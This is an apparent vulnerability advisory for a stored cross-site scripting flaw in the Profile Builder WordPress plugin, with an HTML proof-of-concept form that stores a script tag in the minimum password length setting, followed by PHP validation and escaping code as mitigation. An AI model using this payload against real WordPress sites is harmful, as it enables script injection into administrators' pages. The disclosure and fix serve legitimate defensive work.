Profile Builder <= 5.2.7 - Authenticated Stored Cross-Site Scripting (XSS)



Description
Stored cross-site scripting (XSS) in the minimum password length field (wppb_general_settings[minimum_password_length]) of the plugin's general settings.
Proof of Concept
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/wp/wp-admin/options.php" method="POST">
      <input type="hidden" name="option&#95;page" value="wppb&#95;general&#95;settings" />
      <input type="hidden" name="action" value="update" />
      <input type="hidden" name="&#95;wpnonce" value="a37f914f93" />
      <input type="hidden" name="&#95;wp&#95;http&#95;referer" value="&#47;wp&#47;wp&#45;admin&#47;admin&#46;php&#63;page&#61;profile&#45;builder&#45;general&#45;settings" />
      <input type="hidden" name="wppb&#95;general&#95;settings&#91;extraFieldsLayout&#93;" value="default" />
      <input type="hidden" name="wppb&#95;general&#95;settings&#91;emailConfirmation&#93;" value="no" />
      <input type="hidden" name="wppb&#95;general&#95;settings&#91;activationLandingPage&#93;" value="" />
      <input type="hidden" name="wppb&#95;general&#95;settings&#91;loginWith&#93;" value="usernameemail" />
      <input type="hidden" name="wppb&#95;general&#95;settings&#91;minimum&#95;password&#95;length&#93;" value="8&quot;&gt;&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="wppb&#95;general&#95;settings&#91;minimum&#95;password&#95;strength&#93;" value="strong" />
      <input type="hidden" name="action" value="update" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
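
The PoC stores markup in a setting that should only ever hold a number, so the mitigation has two layers: validate the value as an integer when it is saved, and escape it when it is printed into the settings form. The PHP below is an added example, not Profile Builder's code or the fix from the referenced changeset; the example_* function names and the 1-128 range are assumptions, and only the option and field names come from the PoC above.

```php
<?php
// Added example, not Profile Builder's code. The example_* names and the
// 1-128 range are assumptions; option and field names come from the PoC.

// Save time: the field is a length, so keep it only if it is an integer.
function example_sanitize_min_password_length($raw): string
{
    $len = filter_var(is_string($raw) ? trim($raw) : $raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1, 'max_range' => 128],
    ]);
    return $len === false ? '' : (string) $len; // '' = no minimum set (assumed meaning)
}

// Sanitize callback for the whole option array submitted to options.php.
function example_sanitize_general_settings($input): array
{
    $input = is_array($input) ? $input : [];
    $input['minimum_password_length'] =
        example_sanitize_min_password_length($input['minimum_password_length'] ?? '');
    return $input;
}

// Output time: escape for the attribute context even if the stored value is bad.
function example_render_min_length_input(array $settings): string
{
    $value = $settings['minimum_password_length'] ?? '';
    $value = is_scalar($value) ? (string) $value : '';
    // esc_attr() inside WordPress; htmlspecialchars() is the plain-PHP fallback.
    $escaped = function_exists('esc_attr')
        ? esc_attr($value)
        : htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
    return '<input type="text" name="wppb_general_settings[minimum_password_length]"'
        . ' value="' . $escaped . '" />';
}

if (function_exists('add_action')) {
    // Inside WordPress: attach the callback to the option (illustrative wiring).
    add_action('admin_init', function () {
        register_setting('wppb_general_settings', 'wppb_general_settings', [
            'sanitize_callback' => 'example_sanitize_general_settings',
        ]);
    });
} elseif (PHP_SAPI === 'cli') {
    // Stand-alone run with the value submitted by the PoC.
    $posted = ['minimum_password_length' => '8"><script>alert(1)</script>'];
    $saved = example_sanitize_general_settings($posted);
    var_dump($saved['minimum_password_length']);         // value after save-time validation
    echo example_render_min_length_input($posted), "\n"; // raw value, escaped on output
}
```

Either layer alone stops this PoC; keeping both means a value that reached the database before validation existed is still rendered inert.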

Affects Plugin

References

URL https://plugins.trac.wordpress.org/changeset/1607426/profile-builder

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter f3ci
Submitter Website https://spentera.id
Views 6224
Verified No
WPVDB ID 8776

Timeline

Publicly Published 2017-03-10 (over 3 years ago)
Added 2017-03-15 (over 3 years ago)
Last Updated 2019-11-01 (8 months ago)
